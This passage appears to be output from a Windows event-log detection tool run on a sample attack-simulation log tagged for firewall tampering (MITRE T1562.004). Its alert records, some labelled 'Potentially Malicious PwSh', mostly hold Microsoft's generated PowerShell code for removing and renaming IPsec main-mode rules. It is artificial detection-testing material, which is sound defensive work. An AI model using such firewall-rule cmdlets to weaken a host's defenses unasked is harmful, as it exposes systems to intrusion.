$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 
'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetIPsecMainModeRule' -Alias '*' function Rename-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] 
param(",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters 
$__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName ))",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx +2021-04-23 10:09:44.864 +00:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"[Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] 
[Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, 
$script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', 
